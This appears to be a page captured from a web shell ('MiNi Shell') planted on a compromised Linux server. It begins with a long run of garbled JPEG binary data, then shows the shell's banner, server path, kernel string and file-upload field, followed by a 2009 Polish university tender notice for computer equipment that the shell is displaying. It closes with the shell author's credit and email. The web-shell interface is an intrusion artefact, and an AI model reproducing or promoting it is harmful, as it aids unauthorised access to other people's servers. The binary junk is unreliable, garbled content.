JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146665-N-2009.html

<p class="kh_header"><b>Białystok: dostawa, zainstalowanie i uruchomienie sprzętu w postaci: sprzętu komputerowego, akcesoriów komputerowych, komputerów przenośnych, oraz projektorów multimedialnych przeznaczonych dla poszczególnych jednostek organizacyjnych Uniwersytetu Medycznego w Białymstoku</b><br>
<b>Numer ogłoszenia: 146665 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa, zainstalowanie i uruchomienie sprzętu w postaci: sprzętu komputerowego, akcesoriów komputerowych, komputerów przenośnych, oraz projektorów multimedialnych przeznaczonych dla poszczególnych jednostek organizacyjnych Uniwersytetu Medycznego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa, zainstalowanie i uruchomienie sprzętu w postaci: sprzętu komputerowego, akcesoriów komputerowych, komputerów przenośnych, oraz projektorów multimedialnych przeznaczonych dla poszczególnych jednostek organizacyjnych Uniwersytetu Medycznego w Białymstoku.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.11.00-8, 30.23.72.00-1, 30.21.31.00-6, 38.65.21.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki: 
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień,
   b)   posiadają niezbędną wiedzę oraz doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
    c) znajdują się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia,,     
e)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
art. 24 ustawy Pzp,
            
   2)    Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana 
  wg formuły: spełnia - nie spełnia w oparciu o informacje zawarte w wymaganych 
  w SIWZ dokumentach. Z treści załączonych dokumentów musi wynikać jednoznacznie, 
  że   w/w warunki Wykonawca spełnił.
  3)   Oferta musi być kompletna (tzn. dotyczyć wszystkich pozycji w danej Części) pod rygorem jej odrzucenia.
4)    Wykonawca zostanie wykluczony z postępowania, jeżeli chociaż jeden z w/w warunków 
       nie zostanie spełniony.
5)  Z postępowania o udzielenie zamówienia wykluczeniu podlegają również Wykonawcy, którzy: 
a)	złożą nieprawdziwe informacje mające wpływ na wynik prowadzonego  postępowania; 
b)	nie złożą oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 ustawy Pzp;
c)	nie zgodzili się na przedłużenie okresu związania ofertą.
6)	Ofertę Wykonawcy wykluczonego Zamawiający uzna za odrzuconą.
7)	O wykluczeniu z postępowania Zamawiający po wyborze oferty najkorzystniejszej  niezwłocznie powiadomi Wykonawcę podając uzasadnienie faktyczne i prawne.
8)	Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty.
9)	Oferta musi być napisana w języku polskim, na maszynie do pisania, komputerze lub inną, czytelną i trwałą techniką, oraz podpisana przez osobę upoważnioną do reprezentowania firmy na zewnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty. Każda zapisana strona oferty musi być ponumerowana kolejnymi numerami, a cała oferta zestawiona w sposób trwale połączony. Dokumenty sporządzone w języku obcym winny być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
10)	 Nie dopuszcza się jakichkolwiek poprawek, skreśleń w treści oferty wraz z załącznikami, bez jednoczesnego podpisania się przez osoby uprawnione do reprezentacji Wykonawcy przy naniesionych poprawkach, skreśleniach, itp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W CELU POTWIERDZENIA OCENY SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU (art. 24 - 26, art. 36 ust. 1 pkt. 6 ustawy Pzp oraz Rozporządzenie Prezesa Rady Ministrów w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 188 z 2008 r., poz.1155), tj.:
a)	Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu z art. 24 ust. 1 i 2 ustawy (w przypadku oferty składanej wspólnie  przez kilku Wykonawców, oświadczenie składa każdy wykonawca) - załącznik nr 2 do SIWZ.

1.1.	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy prawo zamówień publicznych, Zamawiający żąda następujących dokumentów: 
 - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej składają zaświadczenie odrębnie.


1.2. Informacje dla Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium RP: 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego  w ust. 1. 1. - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że  nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Termin ważności dokumentów zawierających oświadczenie stosuje się odpowiednio jak w ust. 1.1. 


2.	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca winien załączyć do oferty:
2.1 oświadczenie, że zaoferuje przedmiot zamówienia dopuszczony do obrotu na terytorium 
      RP, posiadający wszelkie wymagane przez przepisy prawa świadectwa, certyfikaty,  
      atesty, deklaracje zgodności, itp. oraz spełniający wszelkie wymagane przez przepisy 
    prawa wymogi w zakresie norm bezpieczeństwa obsługi oraz zobowiążą się, że 
    przedstawią zamawiającemu na każde jego wezwanie wszystkie dokumenty   
    potwierdzające spełnienie powyższych wymogów - na Formularzu ofertowym - 
    załącznik Nr 1 do SIWZ,   

2.2. foldery (prospekty) producenta (tylko w przypadku złożenia ofert równoważnych), potwierdzające spełnienie wszystkich parametrów technicznych. 

Parametry techniczne prezentowane w załączonych prospektach powinny odpowiadać parametrom technicznym opisanym w danych załącznikach do SIWZ. Jeżeli w prospekcie technicznym brak opisu danej funkcji sprzętu lub wartości parametru, dopuszcza się załączenie do oferty innych dokumentów producenta (np. część instrukcji obsługi), w których Zamawiający będzie w stanie zweryfikować zgodność opisu funkcji lub wartości danego parametru.
Uwaga. W przypadku wątpliwości Zamawiający może zażądać dodatkowych dokumentów   potwierdzających spełnianie parametrów warunków, które zostały określone w danych załącznikach do SIWZ. Dokumenty  zostaną udostępnione przez Wykonawców na każde żądanie Zamawiającego.
3)   Dokumenty pozostałe:
a)	wypełniony formularz ofertowy (wg załączonego druku - załącznik nr 1 do SIWZ);
b)	wypełnione szczegółowe formularze cenowe (części A, ,B, C, D) - należy podać dokładne modele oferowanego sprzętu oraz opisać parametry techniczne oferowane;
c)	podpisany załącznik nr 7 do SIWZ (dotyczy części A i C)
d)	oświadczenie, że zaoferowany sprzęt spełnia wymagania oceny zgodności wyrobu, certyfikatu na znak bezpieczeństwa oraz posiada oznakowanie zgodności CE a także posiada deklaracje producenta o zgodności z dyrektywami 73/23/EEC oraz 89/336/EEC -  na formularzu ofertowym - załącznik nr 1 do SIWZ 
e)	   w przypadku Wykonawców występujących wspólnie ( konsorcjum, s. c. ), Wykonawcy  składają oświadczenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy; 
f)	oświadczenia małżonka Wykonawcy ( wg  załącznika nr  6 do  SIWZ ) - zgodnie z zapisem 
       w uwadze poniżej: 
Uwaga: W związku z przepisem art. 787 kodeksu postępowania cywilnego, Wykonawcy występujący w obrocie jako indywidualny podmiot gospodarczy, wspólnicy spółki cywilnej, wspólnicy spółki jawnej, pozostający w związku małżeńskim na zasadzie ustawowej wspólności majątkowej, zobowiązani są do złożenia oświadczeń współmałżonków, których treść stanowi załącznik nr 6 do SIWZ.


 4) Oferta powinna zawierać wszystkie dokumenty (oryginały lub kopie poświadczone za zgodność z oryginałem przez Wykonawcę)  oraz  oświadczenia  wymagane  odpowiednimi  postanowieniami SIWZ. Oświadczenia i dokumenty  podpisuje uprawniony lub upoważniony przedstawiciel Wykonawcy. Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez uprawnionego lub upoważnionego przedstawiciela Wykonawcy. Upoważnienie do podpisania oświadczeń i innych dokumentów powinno być załączone do oferty. Ustanowione pełnomocnictwo musi być załączone do oferty w formie oryginału, odpisu lub kopii potwierdzonej notarialnie. 
5) Wykonawcy występujący wspólnie (konsorcjum, s.c.) muszą ustanowić Wykonawcę - Pełnomocnika do reprezentowania ich w postępowaniu albo Wykonawcę - Pełnomocnika do reprezentowania ich w postępowaniu oraz do zawarcia umowy w sprawie zamówienia. 
        5.1. Dokument potwierdzający ustanowienie Wykonawcy - Pełnomocnika musi być załączony do oferty i zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Wykonawcę - Pełnomocnika oraz zakres jego umocowania. Dokument potwierdzający ustanowienie Wykonawcy - Pełnomocnika musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
       Dokument pełnomocnictwa należy przedstawić w formie oryginału, odpisu lub kserokopii potwierdzonej notarialnie. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako Pełnomocnik pozostałych, przy czym uregulowanie płatności następować będzie wprost na konto danego podmiotu (wyłącznie wskazanego w umowie) lub na utworzone w banku wspólne (np. konsorcjum) konto rozliczeniowe, na które wpłacane będą należności za świadczenia wykonane przez poszczególne podmioty. 
       5.2. Wykonawcy występujące wspólnie muszą złożyć oświadczenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy (dołączyć oświadczenie). 
       5.3. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umwb.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja d/s Zamówień Publicznych UMwB
ul. Mickiewicza 2a, 15-222 Białystok.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 11:00, miejsce: Kancelaria Ogólna UMwB
ul. Jana Kilińskiego 1, 15-089 Białystok.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa, zainstalowanie i uruchomienie sprzętu w postaci: sprzętu komputerowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa, zainstalowanie i uruchomienie sprzętu w postaci: sprzętu komputerowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.11.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci: akcesoriów komputerowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci: akcesoriów komputerowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.72.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci: komputerów przenośnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci: komputerów przenośnych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci: projektorów multimedialnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci: projektorów multimedialnych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.65.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com